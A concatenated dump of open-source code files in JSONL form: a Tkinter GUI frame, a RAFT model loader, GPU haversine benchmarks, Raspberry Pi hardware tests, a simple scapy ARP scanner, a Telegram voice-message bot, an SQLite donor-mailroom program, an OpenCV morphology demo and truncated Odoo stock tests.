scrolled with it\n self.frame_data = frame_data = Frame(canvas, bg=\"#FAFAFA\")\n interior_id = canvas.create_window(0, 0, window=frame_data,\n anchor=NW)\n\n def _configure_interior(e):\n size = (frame_data.winfo_reqwidth(), frame_data.winfo_reqheight())\n canvas.config(scrollregion=\"0 0 %s %s\" % size)\n if frame_data.winfo_reqwidth() != canvas.winfo_width():\n canvas.config(width=frame_data.winfo_reqwidth())\n\n frame_data.bind('', _configure_interior)\n\n def _configure_canvas(e):\n if frame_data.winfo_reqwidth() != canvas.winfo_width():\n canvas.itemconfigure(interior_id, width=canvas.winfo_width())\n\n canvas.bind('', _configure_canvas)\n\n def create_list(self):\n # Loading the data in labels\n for r, ob_list in enumerate(self.data):\n for c, ob_tup in enumerate(ob_list):\n Label(self.frame_data, text=ob_tup, bg=\"#FAFAFA\", fg=\"#333333\", font=(\"Roboto Lt\", 16)).grid(row=r,\n column=c,\n sticky=W,\n ipady=10,\n ipadx=30)\n\n def place_frame(self):\n self.frame.place(x=0, y=80)\n\n def forget_place(self):\n self.frame.place_forget()\n\n def delete_history(self):\n print(\"DELETE\")\n","sub_path":"frames/HistoryFrame.py","file_name":"HistoryFrame.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"517084863","text":"import argparse\nimport io\nimport os\nimport time\nimport urllib.request\nimport zipfile\nimport torch\nfrom torch.nn import functional as F\n\ntry:\n from core.raft import RAFT as RAFT_module\nexcept ModuleNotFoundError:\n from .core.raft import RAFT as RAFT_module\n\nmodels_url = \"https://www.dropbox.com/s/a2acvmczgzm6f9n/models.zip?dl=1\" # dl=1 is important\n\n\n__all__ = [\"RAFT\"]\n\n\nENV_TORCH_HOME = \"TORCH_HOME\"\nENV_XDG_CACHE_HOME = \"XDG_CACHE_HOME\"\nDEFAULT_CACHE_DIR = \"~/.cache\"\n\n\ndef _get_torch_home():\n torch_home = os.path.expanduser(\n os.getenv(\n ENV_TORCH_HOME, os.path.join(os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), \"torch\")\n )\n )\n return torch_home\n\n\ndef _pad8(img):\n \"\"\"pad image such that dimensions are divisible by 8\"\"\"\n ht, wd = img.shape[2:]\n pad_ht = (((ht // 8) + 1) * 8 - ht) % 8\n pad_wd = (((wd // 8) + 1) * 8 - wd) % 8\n pad_ht1 = [pad_ht // 2, pad_ht - pad_ht // 2]\n pad_wd1 = [pad_wd // 2, pad_wd - pad_wd // 2]\n\n img = F.pad(img, pad_wd1 + pad_ht1, mode=\"replicate\")\n return img\n\n\ndef RAFT(pretrained=False, model_name=\"chairs+things\", device=None, **kwargs):\n \"\"\"\n RAFT model (https://arxiv.org/abs/2003.12039)\n model_name (str): One of 'chairs+things', 'sintel', 'kitti' and 'small'\n note that for 'small', the architecture is smaller\n \"\"\"\n\n model_list = [\"chairs+things\", \"sintel\", \"kitti\", \"small\"]\n if model_name not in model_list:\n raise ValueError(\"Model should be one of \" + str(model_list))\n\n model_args = argparse.Namespace(**kwargs)\n model_args.small = \"small\" in model_name\n\n model = RAFT_module(model_args)\n if device is None:\n device = torch.cuda.current_device() if torch.cuda.is_available() else \"cpu\"\n if device != \"cpu\":\n model = torch.nn.DataParallel(model, device_ids=[device])\n else:\n model = torch.nn.DataParallel(model)\n model.device_ids = None\n\n if pretrained:\n torch_home = _get_torch_home()\n model_dir = os.path.join(torch_home, \"checkpoints\", \"models_RAFT\")\n model_path = os.path.join(model_dir, \"models\", model_name + \".pth\")\n if not os.path.exists(model_dir):\n os.makedirs(model_dir, exist_ok=True)\n response = urllib.request.urlopen(models_url, timeout=10)\n z = zipfile.ZipFile(io.BytesIO(response.read()))\n z.extractall(model_dir)\n else:\n time.sleep(10) # Give the time for the models to be downloaded and unzipped\n\n map_location = torch.device('cpu') if device == \"cpu\" else None\n model.load_state_dict(torch.load(model_path, map_location=map_location))\n\n model = model.to(device)\n model.eval()\n return model\n\n\ndef apply_model(model, images_from, images_to, iters=12, upsample=True):\n \"\"\"\n Applies optical flow model to the pairs of images\n Args:\n images_from: torch.Tensor of size [B, H, W, C] containing RGB data for\n images that serve as optical flow source images\n images_to: torch.Tensor of size [B, H, W, C] containing RGB data for\n images that serve as optical flow destination images\n Return:\n optical_flow: torch.Tensor of size [B, H, W, 2]\n \"\"\"\n images_from, images_to = _pad8(images_from), _pad8(images_to)\n with torch.no_grad():\n return model(image1=images_from, image2=images_to, iters=iters, upsample=upsample)\n","sub_path":"hubconf_models.py","file_name":"hubconf_models.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"120973843","text":"#!/usr/bin/python\nimport os\nimport math\nimport sys\nimport time\nimport numpy as np\nimport torch\n\nsys.path.append(\"../../lib\")\nsys.path.append(\"../../pycomposer\")\nsys.path.append(\".\")\n\nfrom sa.annotation import Backend\nfrom mode import Mode\n\nDEFAULT_SIZE = 1 << 26\nDEFAULT_CPU = 1 << 13\nMAX_BATCH_SIZE = 1 << 28\n\n\ndef get_data(size):\n \"\"\"Input data starts on the CPU, as if it came from another\n step in the pipeline.\n\n Parameters:\n - size: number of elements\n \"\"\"\n\n lats = np.ones(size, dtype='float64') * 0.0698132\n lons = np.ones(size, dtype='float64') * 0.0698132\n return lats, lons\n\n\ndef haversine(lat2, lon2, oas=True, use_torch=True):\n \"\"\"The \"original\" workload.\n\n Parameters:\n - oas: true if using OAs, false if using the CPU library\n - use_torch: true if torch, false if cupy (only relevant if using OAs)\n \"\"\"\n if oas:\n if use_torch:\n import sa.annotated.numpy_torch as np\n import sa.annotated.numpy_torch as ss\n else:\n import sa.annotated.numpy_cupy as np\n import sa.annotated.numpy_cupy as ss\n else:\n import numpy as np\n import scipy.special as ss\n\n # Allocate output array and temporary arrays\n size = len(lat2)\n a = np.empty(size, dtype='float64')\n dlat = np.empty(size, dtype='float64')\n dlon = np.empty(size, dtype='float64')\n\n if oas:\n a.materialize = Backend.CPU\n\n # Begin computation\n lat1 = 0.70984286\n lon1 = 1.23892197\n MILES_CONST = 3959.0\n\n np.subtract(lat2, lat1, out=dlat)\n np.subtract(lon2, lon1, out=dlon)\n\n # dlat = sin(dlat / 2.0) ** 2.0\n np.divide(dlat, 2.0, out=dlat)\n np.sin(dlat, out=dlat)\n np.multiply(dlat, dlat, out=dlat)\n\n # a = cos(lat1) * cos(lat2)\n lat1_cos = math.cos(lat1)\n np.cos(lat2, out=a)\n np.multiply(a, lat1_cos, out=a)\n\n # a = a + sin(dlon / 2.0) ** 2.0\n np.divide(dlon, 2.0, out=dlon)\n np.sin(dlon, out=dlon)\n np.multiply(dlon, dlon, out=dlon)\n np.multiply(a, dlon, out=a)\n np.add(dlat, a, out=a)\n\n c = a\n np.sqrt(a, out=a)\n np.arcsin(a, out=a)\n np.multiply(a, 2.0, out=c)\n\n mi = c\n np.multiply(c, MILES_CONST, out=mi)\n\n # Materialize outputs\n if oas:\n np.evaluate(\n workers=1,\n batch_size={\n Backend.CPU: DEFAULT_CPU,\n Backend.GPU: MAX_BATCH_SIZE,\n },\n force_cpu=False,\n paging=size > MAX_BATCH_SIZE,\n )\n return a.value\n else:\n return a\n\n\ndef run_numpy(lats, lons):\n return haversine(lats, lons, oas=False)\n\n\ndef run_bach_torch(lats, lons):\n return haversine(lats, lons, oas=True, use_torch=True)\n\n\ndef run_bach_cupy(lats, lons):\n return haversine(lats, lons, oas=True, use_torch=False)\n\n\ndef run_torch(lat2, lon2):\n import torch\n\n # Allocate temporary arrays\n size = len(lat2)\n a = torch.empty(size, dtype=torch.float64, device=torch.device('cuda'))\n dlat = torch.empty(size, dtype=torch.float64, device=torch.device('cuda'))\n dlon = torch.empty(size, dtype=torch.float64, device=torch.device('cuda'))\n\n # Transfer inputs to the GPU\n lat2 = torch.from_numpy(lat2).cuda()\n lon2 = torch.from_numpy(lon2).cuda()\n\n # Begin computation\n lat1 = 0.70984286\n lon1 = 1.23892197\n MILES_CONST = 3959.0\n\n torch.sub(lat2, lat1, out=dlat)\n torch.sub(lon2, lon1, out=dlon)\n\n # dlat = sin(dlat / 2.0) ** 2.0\n torch.div(dlat, 2.0, out=dlat)\n torch.sin(dlat, out=dlat)\n torch.mul(dlat, dlat, out=dlat)\n\n # a = cos(lat1) * cos(lat2)\n lat1_cos = math.cos(lat1)\n torch.cos(lat2, out=a)\n torch.mul(a, lat1_cos, out=a)\n\n # a = a + sin(dlon / 2.0) ** 2.0\n torch.div(dlon, 2.0, out=dlon)\n torch.sin(dlon, out=dlon)\n torch.mul(dlon, dlon, out=dlon)\n torch.mul(a, dlon, out=a)\n torch.add(dlat, a, out=a)\n\n c = a\n torch.sqrt(a, out=a)\n torch.asin(a, out=a)\n torch.mul(a, 2.0, out=c)\n\n mi = c\n torch.mul(c, MILES_CONST, out=mi)\n\n # Transfer outputs back to CPU\n torch.cuda.synchronize()\n a = a.cpu().numpy()\n\n return a\n\n\ndef run_cupy(lat2, lon2):\n import cupy as cp\n\n # Allocate temporary arrays\n size = len(lat2)\n a = cp.empty(size, dtype='float64')\n dlat = cp.empty(size, dtype='float64')\n dlon = cp.empty(size, dtype='float64')\n\n # Transfer inputs to the GPU\n lat2 = cp.array(lat2)\n lon2 = cp.array(lon2)\n\n # Begin computation\n lat1 = 0.70984286\n lon1 = 1.23892197\n MILES_CONST = 3959.0\n\n cp.subtract(lat2, lat1, out=dlat)\n cp.subtract(lon2, lon1, out=dlon)\n\n # dlat = sin(dlat / 2.0) ** 2.0\n cp.divide(dlat, 2.0, out=dlat)\n cp.sin(dlat, out=dlat)\n cp.multiply(dlat, dlat, out=dlat)\n\n # a = cos(lat1) * cos(lat2)\n lat1_cos = math.cos(lat1)\n cp.cos(lat2, out=a)\n cp.multiply(a, lat1_cos, out=a)\n\n # a = a + sin(dlon / 2.0) ** 2.0\n cp.divide(dlon, 2.0, out=dlon)\n cp.sin(dlon, out=dlon)\n cp.multiply(dlon, dlon, out=dlon)\n cp.multiply(a, dlon, out=a)\n cp.add(dlat, a, out=a)\n\n c = a\n cp.sqrt(a, out=a)\n cp.arcsin(a, out=a)\n cp.multiply(a, 2.0, out=c)\n\n mi = c\n cp.multiply(c, MILES_CONST, out=mi)\n\n # Transfer outputs back to CPU\n a = cp.asnumpy(a)\n\n return a\n\n\ndef run(mode, use_torch, size, cpu, gpu, threads):\n # Optimal defaults\n if size == None:\n size = DEFAULT_SIZE\n if mode == Mode.GPU or mode == Mode.BACH:\n torch.cuda.init()\n torch.cuda.synchronize()\n\n start = time.time()\n inputs = get_data(size)\n print('Inputs:', time.time() - start)\n\n start = time.time()\n if mode == Mode.CPU:\n result = run_numpy(*inputs)\n elif mode == Mode.GPU:\n if use_torch:\n result = run_torch(*inputs)\n else:\n result = run_cupy(*inputs)\n elif mode == Mode.BACH:\n if use_torch:\n result = run_bach_torch(*inputs)\n else:\n result = run_bach_cupy(*inputs)\n else:\n raise ValueError\n runtime = time.time() - start\n sys.stdout.write('Runtime: {}\\n'.format(runtime))\n sys.stdout.flush()\n\n print(result)\n return 0, runtime\n\n\ndef run_torch_main(mode, size=None, cpu=None, gpu=None, threads=1):\n return run(mode, True, size=size, cpu=cpu, gpu=gpu, threads=threads)\n\n\ndef run_cupy_main(mode, size=None, cpu=None, gpu=None, threads=1):\n return run(mode, False, size=size, cpu=cpu, gpu=gpu, threads=threads)\n","sub_path":"benchmarks/workloads/haversine.py","file_name":"haversine.py","file_ext":"py","file_size_in_byte":6445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"192378478","text":"#\n# This Script is for bare bones functionality testing of the RPiMIB\n#\n# This file is intended to be a script that is run from ipython3, for example the code here should be copied an pasted\n# sometimes line by line into the ipython3 console.\n#\n# At some point this should be made into a full testing script that can be run from the command line.\n# Or perhaps it can be brought into Unit Tests.\n\nimport spidev\nimport os\nfrom time import sleep\nimport RPi.GPIO as GPIO\nfrom pidev.stepper import stepper\nfrom Slush.Devices import L6470Registers\nfrom pidev.Cyprus_Commands import Cyprus_Commands_RPi as cyprus\nspi = spidev.SpiDev()\n\n# Init a 200 steps per revolution stepper on Port 0\ns0 = stepper(port=0, micro_steps=32, hold_current=20, run_current=20, accel_current=20, deaccel_current=20,\n steps_per_unit=200, speed=8)\n\ns0.start_relative_move(5) # make motor on port 0 rotate 5 turns\n\ns0.free_all()\n\ncyprus.initialize() # initialize the cyprus\nversion = cyprus.read_firmware_version() # read the version of the cyprus firmware\nprint(version) # print the version to the screen - should be something like 3.1.2 (11/12/19)\n\ncyprus.setup_servo(1) # sets up P4 on the RPiMIB as a RC servo style output\n\ncyprus.set_servo_position(1, 0) # 1 specifies port P4, 0 is a float from 0-1 that specifies servo position ~(0-180deg)\n\nsleep(1) # wait one second for the servo to get there\n\ncyprus.set_servo_position(1, .5) # 1 specifies port P4, 0.5 specifies servo position ~(0-180deg) range of (0-1)\n\nsleep(1) # wait one second for the servo to get there... minimum here should be about sleep(0.05)\n\ncyprus.set_servo_position(1, 1) # 1 specifies port P4, 1 specifies servo position ~(0-180deg) range of (0-1)\n\n# test the RPiMIB P6 reads - connect a limit switch or proximity sensor to P6 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b0001): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b0001): # a little debounce logic\n print(\"GPIO on port P6 is HIGH\")\n else:\n print(\"GPIO on port P6 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n\n# test the RPiMIB P7 reads - connect a limit switch or proximity sensor to P7 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b0010): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b0010):\n print(\"GPIO on port P7 is HIGH\")\n else:\n print(\"GPIO on port P7 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n\n# test the RPiMIB P8 reads - connect a limit switch or proximity sensor to P8 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b0100): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b0100): # a little debounce logic\n print(\"GPIO on port P8 is HIGH\")\n else:\n print(\"GPIO on port P8 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n\n# test the RPiMIB P9 reads - connect a limit switch or proximity sensor to P9 run the code below\nwhile True:\n if (cyprus.read_gpio() & 0b1000): # binary bitwise AND of the value returned from read.gpio()\n sleep(1)\n if (cyprus.read_gpio() & 0b1000):\n print(\"GPIO on port P9 is HIGH\")\n else:\n print(\"GPIO on port P9 is LOW\")\n sleep(1)\n# opening and closing the switch or proximity sensor should get the print to toggle between HIGH and LOW\n# when done disconnect the RPiMIB communication\n\ncyprus.close()\nspi.close()\nGPIO.cleanup()","sub_path":"RPiMIB_Test_Script.py","file_name":"RPiMIB_Test_Script.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"112690100","text":"import scapy.all as scapy \r\nimport optparse\r\n\r\ndef get_user_input():\r\n\tparse_obje = optparse.OptionParser()\r\n\tparse_obje.add_option(\"-i\",\"--ipaddress\",dest=\"ip_address\",help=\"Enter IP Address\")\r\n\t\r\n\t(user_input,arguments) = parse_obje.parse_args()\r\n\t\r\n\tif not user_input.ip_address:\r\n\t\tprint(\"Enter IP Address\")\r\n\t\t\r\n\treturn user_input\r\n\t\t\r\n\r\ndef scan_my_network(ip):\t\r\n\tarp_request_packet = scapy.ARP(pdst=ip)\t\t\t\r\n\tbroadcast_packet = scapy_Ether(dst=\"ff:ff:ff:ff:ff:ff\") \t\r\n\tcomnined_packet = broadcast_packet/arp_request_packet\t\t\r\n\t(answered_list,unanswered_list) = scapy_srp(comnined_packet,timeout=1)\r\n\t\r\n\tanswered_list.summary()\r\n\t\r\nuser_ip_address = get_user_input()\r\nscan_my_network(user_ip_address.ip_address)\r\n\r\n\r\n \r\n ","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"441584627","text":"# -*- coding: utf-8 -*-\r\n'''\r\n======================Welcome to Python====================\r\n/-********Have a good time.********-/\r\n\r\nFILE NAME:\r\nAUTHOR: Eden·Gabriel \r\nDATE: Dec-21-Thu/2018 12:26:25 \r\nVERSION: V-1.0\r\nDESCRIPTION:\r\n形态学变换\r\n'''\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nimg = cv2.imread('E:\\\\A_BOOM_LEARNING_EDEN_GABRIEL\\\\2018.12.19start_opencv+python\\\\Images\\\\pic2.png')\r\nimg_gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\nimg_gau = cv2.GaussianBlur(img_gray,(5,5),0)\r\nret,thre = cv2.threshold(img_gau,150,255,cv2.THRESH_BINARY_INV)\r\n\r\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))\r\n#kernel = np.ones((5,5),np.uint8)\r\n\r\nres = cv2.erode(thre,kernel,iterations = 1)\r\nopening = cv2.morphologyEx(thre,cv2.MORPH_OPEN,kernel)\r\nclosing = cv2.morphologyEx(thre,cv2.MORPH_CLOSE,kernel)\r\nopening_inv = cv2.bitwise_not(opening)\r\ngradient = cv2.morphologyEx(closing,cv2.MORPH_GRADIENT,kernel)\r\n\rtophat = cv2.morphologyEx(closing,cv2.MORPH_TOPHAT,kernel)\r\nblackhat = cv2.morphologyEx(closing,cv2.MORPH_BLACKHAT,kernel)\r\n\r\ncv2.imshow('tophat',tophat)\r\ncv2.imshow('blackhat',blackhat)\r\ncv2.imshow('gradient',gradient)\r\ncv2.imshow('closing',closing)\r\ncv2.imshow('opening_inv',opening_inv)\r\ncv2.imshow('opening',opening)\r\n#res1 = cv2.dilate(thre,kernel,iterations = 1)\r\ncv2.imshow('res',res)\r\n#cv2.imshow('res1',res1)\r\ncv2.imshow('thre',thre)\r\n\r\nk = cv2.waitKey(0)&0xFF\r\nif k == 27:\r\n cv2.destroyAllWindows()\r\n","sub_path":"形态学变换.py","file_name":"形态学变换.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"565382896","text":"import telepot\nimport os\nimport requests\nimport time\nfrom telepot.loop import MessageLoop\n\n\n# Create bot using token saved as environment variable\nTOKEN = os.environ.get('TOKEN')\nbot = telepot.Bot(TOKEN)\n\ndef add_new_record(file, user_id):\n \"\"\" Create new audio file in the folder named\n as an id of a user who send the record \"\"\"\n\n dir_name = str(user_id)\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n number = str(len(os.listdir(dir_name)))\n with open(dir_name + '/audio_message_' + number + '.oga', 'wb') as voice_message:\n voice_message.write(file.content)\n\n\ndef on_chat_message(msg):\n \"\"\" Process messages \"\"\"\n\n content_type, chat_type, chat_id = telepot.glance(msg)\n if content_type == 'voice':\n user_id = msg['from']['id']\n file_id = msg['voice']['file_id']\n file_info = bot.getFile(file_id)\n file = requests.get('https://api.telegram.org/file/bot{0}/{1}'\n .format(TOKEN, file_info['file_path']))\n add_new_record(file, user_id)\n\n\nMessageLoop(bot, {'chat': on_chat_message}).run_as_thread()\nwhile True:\n time.sleep(10)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"607496154","text":"from bisect import bisect_left, bisect_right\n\ndef count_by_range(a, left_value, right_value):\n left_index = bisect_left(a, left_value)\n right_index = bisect_right(a, right_value)\n return right_index - left_index\n\ndef solution(words, queries):\n answer = []\n array = [[] for _ in range(10001)]\n reverse_array = [[] for _ in range(10001)]\n \n for word in words:\n array[len(word)].append(word)\n reverse_array[len(word)].append(word[::-1])\n \n for i in range(10001):\n array[i].sort()\n reverse_array[i].sort()\n \n for i in queries:\n if i[0] != \"?\":\n ans = count_by_range(array[len(i)], i.replace('?', 'a'), i.replace('?','z'))\n else:\n ans = count_by_range(reverse_array[len(i)], i[::-1].replace('?','a'), i[::-1].replace('?','z'))\n answer.append(ans)\n return answer\n","sub_path":"pystudy/Exercise/이진탐색/Q30.py","file_name":"Q30.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"250909768","text":"'''\nfile: classes_mailroom.py\nelmar_m / 22e88@mailbox.org\nLesson09: classes for OOP mailroom program \n'''\n\nimport sqlite3, time\nfrom collections import defaultdict \n\nclass Donor:\n def __init__(self, fname, lname):\n self.firstname = fname\n self.lastname = lname\n self.uid = '{}_{}'.format(fname, lname) \n self.db= sqlite3.connect('BLABLA.db')\n self.dcursor = self.db.cursor()\n self.dcursor.execute('''create table if not exists donors\n (uid TEXT PRIMARY KEY, \n fname TEXT, lname TEXT, last_donation INT DEFAULT 0)''')\n\n\n def check_existence(self, uid):\n self.dcursor.execute('select * from donors where uid = ?', (uid,))\n result = self.dcursor.fetchall()\n if len(result) == 0:\n return None\n else:\n return True\n \n \n def create(self, uid, fname, lname, last_donation=None):\n try:\n self.dcursor.execute('''insert into donors \n (uid, fname, lname, last_donation)\n values (?, ?, ?, ?)''', (uid, fname, lname, last_donation))\n self.db.commit()\n return True\n except sqlite3.Error as e:\n print('Exception raised: {}'.format(e))\n return False\n\n\n def get_last_donation(self, donor):\n try:\n self.dcursor.execute('select from donors (last_donation) where uid = ?', (donor))\n return self.dcursor.fetchall()\n except sqlite3.Error as e:\n print('Exception raised: {}'.format(e))\n return None\n \n\nclass Mailroom:\n def __init__(self):\n self.db= sqlite3.connect('BLABLA.db')\n self.cursor = self.db.cursor()\n self.cursor.execute('''create table if not exists mailroom\n (donation_ID INTEGER PRIMARY KEY AUTOINCREMENT, \n date TEXT, donor TEXT, donation INT DEFAULT 0)''')\n\n\n def add_donation(self, donor, amount):\n ts = time.strftime('%Y%m%d-%H%M%S')\n try: \n self.cursor.execute('insert into mailroom (date, donor, donation) values(?, ?, ?)', (ts, donor, amount)) \n self.cursor.execute('update donors set last_donation = ? where uid = ?', (amount, donor)) \n self.db.commit()\n return True\n except sqlite3.Error as e:\n print('Exception raised: {}'.format(e))\n\n\n def get_donations(self, donor):\n self.cursor.execute('select date, donation from mailroom where donor = ?', (donor,))\n return self.cursor.fetchall()\n\n\n def _get_average_donation(self, donor):\n total = self._get_donations_total(donor)\n num = self._get_number_of_donations(donor)\n avg = total / num\n return format(avg, '.2f')\n \n\n def _get_number_of_donations(self, donor):\n self.cursor.execute('select * from mailroom where donor = ?', (donor,))\n num = self.cursor.fetchall()\n return len(num)\n\n \n def _get_donations_total(self, donor):\n self.cursor.execute('select donation from mailroom where donor = ?', (donor,))\n res = self.cursor.fetchall()\n dlist = [x[0] for x in res]\n total = sum(dlist) \n return total\n \n\n def get_all_donors(self):\n self.cursor.execute('select donor from mailroom')\n raw = set(self.cursor.fetchall()) # unifying result by putting it into a set\n return raw\n \n\n def multiply(self, factor, above=None, below=None):\n if above is None and below is None:\n sql_show = 'select count(*) from mailroom where donation'\n sql_total = 'select sum(donation) from mailroom where donation'\n sql = 'update mailroom set donation = donation * ?'\n args = (factor,)\n self._preview(sql_show)\n self.map_multiply(factor)\n self._preview_total(sql_total, factor)\n self._decide(sql, args)\n elif below:\n sql_show = 'select count(*) from mailroom where donation < ' + below\n sql_total = 'select sum(donation) from mailroom where donation < ' + below\n sql = 'update mailroom set donation = donation * ? where donation < ?'\n args = (factor, below)\n self._preview(sql_show)\n self.map_multiply(factor, below=below)\n self._preview_total(sql_total, factor)\n self._decide(sql, args)\n elif above:\n sql_show = 'select count(*) from mailroom where donation > ' + above\n sql_total = 'select sum(donation) from mailroom where donation > ' + above\n sql = 'update mailroom set donation = donation * ? where donation > ?'\n args = (factor, above)\n self._preview(sql_show)\n self.map_multiply(factor, above=above)\n self._preview_total(sql_total, factor)\n self._decide(sql, args)\n return True\n \n \n def _decide(self, sql, args):\n decision = input('\\n\\tDo you really want to accept this CHALLENGE ? (Y/N)')\n if decision == 'Y':\n self._write_to_db(sql, args)\n else:\n print('\\n\\tCHALLENGE aborted.')\n\n\n def _preview(self, show):\n self.cursor.execute(show)\n rows = self._beautify(self.cursor.fetchall())\n print('\\n\\tThis operation would affect {} already existing donations!'.format(rows[0]))\n print('\\tSee a listing:\\n')\n\n \n def _preview_total(self, total, factor): \n self.cursor.execute(total)\n value = self._beautify(self.cursor.fetchall())\n value_int = int(value[0])\n result = value_int * int(factor)\n print('\\n\\tYou would have to give an additional donation of {} to pass the CHALLENGE !'.format(result))\n\n\n def _write_to_db(self, sql, args):\n try:\n self.cursor.execute(sql, args)\n self.db.commit()\n print('\\n\\tThank you! Donations successfully updated in database.')\n except sqlite3.Error as e:\n print('Exception raised 4: {}'.format(e))\n \n\n def map_multiply(self, factor, above=None, below=None):\n self.cursor.execute('select donation from mailroom where donation')\n donations_all = self._beautify(self.cursor.fetchall())\n if above is None and below is None: \n donations_after = list(map(lambda x: x * int(factor), donations_all))\n for i in zip(donations_all, donations_after):\n print('\\tcurrent donation: {:<10} multiplied: {}'.format(i[0], i[1]))\n elif below:\n donations_below = list(filter(lambda x: x < int(below), donations_all))\n donations_after = list(map(lambda x: x * int(factor), donations_below))\n for i in zip(donations_below, donations_after):\n print('\\tcurrent donation: {:<10} multiplied: {}'.format(i[0], i[1]))\n elif above:\n donations_above = list(filter(lambda x: x > int(above), donations_all))\n donations_after = list(map(lambda x: x * int(factor), donations_above))\n for i in zip(donations_above, donations_after):\n print('\\tcurrent donation: {:<10} multiplied: {}'.format(i[0], i[1]))\n\n\n # ToDo: make more consistent usage of this function throughout the program... or omit it at all.\n def _beautify(self, listoftuples):\n ''' cursor.fetchall() returns a list of tuples (in our case mostly one-element tuples).\n This method changes that into a list of single items (INT, STRING, whatever). \n '''\n resultlist = [x[0] for x in listoftuples] \n return resultlist\n \n\n def report(self):\n donordict = defaultdict(list)\n maxn = 0\n for i in self.get_all_donors():\n person = i[0]\n total = self._get_donations_total(person)\n slen = len(str(total))\n if slen > maxn:\n maxn = slen\n num = self._get_number_of_donations(person)\n avg = self._get_average_donation(person)\n donordict[person].append(total)\n donordict[person].append(num)\n donordict[person].append(avg)\n maxn += 3\n fstring = '\\t{:<20} ' + '|' + '{:>' + str(maxn) + '} ' + '|' + '{:>9}' + '|' + '{:>20}' \n print(fstring.format('Donor Name', 'Total', 'Num Gifts', 'Average Gift')) \n print('\\t' + '-' * (maxn + 54)) \n for i in donordict:\n print(fstring.format(i, donordict[i][0], donordict[i][1], donordict[i][2])) \n \n \n def mail(self):\n with open('./MAIL_TEMPLATE', 'r') as fr:\n lines = fr.readlines()\n for name in self._beautify(self.get_all_donors()):\n ts = time.strftime('%Y%m%d-%H%M%S')\n filename = name + '_' + ts + '.txt'\n self.cursor.execute('select * from donors where uid = ?', (name,))\n result = self.cursor.fetchall()\n if len(result) == 0:\n print('====Last_donation not found: {}'.format(name))\n else:\n last_donation = result[0][3]\n donation = str(last_donation)\n with open(filename, 'w') as fw:\n for i in lines:\n if 'NAME' in i:\n new = i.replace('NAME', name)\n fw.write(new)\n elif 'DONATION' in i:\n new = i.replace('DONATION', donation)\n fw.write(new)\n else:\n fw.write(i)\n print('\\tMailtext for {} successfully written to {}'.format(name, filename))\n \n \n\n","sub_path":"students/elmar_m/lesson10/classes_mailroom.py","file_name":"classes_mailroom.py","file_ext":"py","file_size_in_byte":9763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115992332","text":"# Copyright 2020 VentorTech OU\n# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl-3.0).\n\nfrom datetime import date\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestStockRouting(TransactionCase):\n\n def setUp(self):\n super(TestStockRouting, self).setUp()\n\n self.base_company = self.env.ref('base.main_company')\n\n self.product_product_model = self.env['product.product']\n self.res_users_model = self.env['res.users']\n self.stock_location_model = self.env['stock.location']\n self.stock_move_model = self.env['stock.move']\n self.stock_picking_model = self.env['stock.picking']\n self.stock_quant_model = self.env['stock.quant']\n\n self.picking_internal = self.env.ref('stock.picking_type_internal')\n\n today = date.today()\n\n self.env['res.config.settings'].create({\n 'outgoing_routing_strategy': 'location_id.removal_prio',\n 'outgoing_routing_order': '0',\n 'stock_reservation_strategy': 'base',\n }).execute()\n\n self.stock_A = self.stock_location_model.create({\n 'name': 'A',\n 'usage': 'internal',\n })\n\n self.stock_A1 = self.stock_location_model.create({\n 'name': 'A-1',\n 'usage': 'internal',\n 'location_id': self.stock_A.id,\n 'removal_prio': 2,\n })\n\n self.stock_A2 = self.stock_location_model.create({\n 'name': 'A-2',\n 'usage': 'internal',\n 'location_id': self.stock_A.id,\n 'removal_prio': 3,\n })\n\n self.stock_A3 = self.stock_location_model.create({\n 'name': 'A-3',\n 'usage': 'internal',\n 'location_id': self.stock_A.id,\n 'removal_prio': 1,\n })\n\n self.stock_B = self.stock_location_model.create({\n 'name': 'B',\n 'usage': 'internal',\n })\n\n self.product_Z = self.product_product_model.create({\n 'name': 'Product',\n 'type': 'product',\n })\n\n quant_1 = self.stock_quant_model.create({\n 'product_id': self.product_Z.id,\n 'location_id': self.stock_A1.id, # prio:2\n 'quantity': 15.0,\n 'in_date': today,\n })\n\n quant_2 = self.stock_quant_model.create({\n 'product_id': self.product_Z.id,\n 